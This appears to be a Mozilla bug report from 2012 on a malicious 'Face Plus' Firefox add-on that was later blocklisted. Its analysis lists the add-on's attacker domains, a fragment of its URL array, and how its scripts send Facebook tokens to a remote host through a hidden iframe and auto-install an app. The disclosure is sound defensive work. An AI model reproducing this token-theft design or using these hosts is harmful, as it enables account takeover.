Malicious "Face Plus" add-on

RESOLVED FIXED

Status

()

Toolkit
Blocklisting
RESOLVED FIXED
5 years ago
a year ago

People

(Reporter: MarkH, Assigned: jorgev)

Tracking

Firefox Tracking Flags

(Not tracked)

Details

Attachments

(1 attachment)

490.38 KB, application/octet-stream
Details
(Reporter)

Description

5 years ago
Created attachment 612702 [details]
20120406_faceplus.zip

User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.142 Safari/535.19

Steps to reproduce:

Downloaded from http://install.faceplus.biz/face-plus.xpi



Actual results:

NOTE: Attempt to access any of the JS directly, without a referer of
Facebook will get you bounced to
http://userscripts.org/scripts/source/61761.user.js, which is the
SocialFixer plugin JS

adobeflashplayer.js:

JS in add-on
Injects http://cdn.faceplus.biz/faceplus.js,



faceplus.js:

URLs included at start of script
var reklam ="http://ads.faceplus.biz/reklam.html?&s&";
var bokcurl='http://faceklenti10.zapto.org/yon.php';
linek=new
Array("http://begeni.zapto.org/yon.php","http://faceplus2.mm.am/yon.php","h
ttp://faceplus3.mm.am/yon.php","http://faceplus4.mm.am/yon.php","http://fac
eplus5.mm.am/yon.php","http://faceplus.crabdance.com/yon.php","http://facep
lus.uk.to/yon.php","http://faceplus.ignorelist.com/","http://faceplus.stran
gled.net/","http://faceplus.twilightparadox.com/
<http://begeni.zapto.org/yon.php%22,%22http://faceplus2.mm.am/yon.php%22,%2
2http://faceplus3.mm.am/yon.php%22,%22http://faceplus4.mm.am/yon.php%22,%22
http://faceplus5.mm.am/yon.php%22,%22http://faceplus.crabdance.com/yon.php%
22,%22http://faceplus.uk.to/yon.php%22,%22http://faceplus.ignorelist.com/%2
2,%22http://faceplus.strangled.net/%22,%22http://faceplus.twilightparadox.c
om/>");


Injects http://graph.facebook.com/<uid>?callback=cins, to get your public
profile data

Injects http://cdn.faceplus.biz/graph.js or http://faceplus.biz/z.js

Tries to inject
'http://ec2-46-137-155-64.eu-west-1.compute.amazonaws.com/camera/2012/04/03
/16/1333458695713783.jpg as a script, AWS returns an error


graph.js:

Posts the user's tokens to http://begeni.zapto.org/pom.html? every hour,
via a hidden iframe; once the attacker has these tokens, they can post as
the user, from any computer/server they want.

Injects
http://ec2-46-137-155-64.eu-west-1.compute.amazonaws.com/camera/2012/03/28/
19/1332953948955831.jpg as the source of a script tag

Uses local storage to maintain state

z.js:

Can do the following, based on configuration:
like a page
add a subscription
send a friend request
report users as abusive

Auto installs FB App 338319369521728, giving it full access to the user's
account

Posts the user's tokens to http://begeni.zapto.org/pom.html? every hour,
via a hidden iframe; once the attacker has these tokens, they can post as
the user, from any computer/server they want.

Uses local storage to maintain state



Expected results:

It should not steal your tokens and send them to a third party server or install a Facebook app without your consent.
(Assignee)

Comment 1

5 years ago
ID: {8f42fb8b-b6f6-45de-81c0-d6d39f54f971}
Assignee: nobody → jorge
Status: UNCONFIRMED → ASSIGNED
Ever confirmed: true
(Assignee)

Comment 2

5 years ago
Blocked: https://addons.mozilla.org/en-US/firefox/blocked/i82
Status: ASSIGNED → RESOLVED
Last Resolved: 5 years ago
Resolution: --- → FIXED
Product: addons.mozilla.org → Toolkit
You need to log in before you can comment on or make changes to this bug.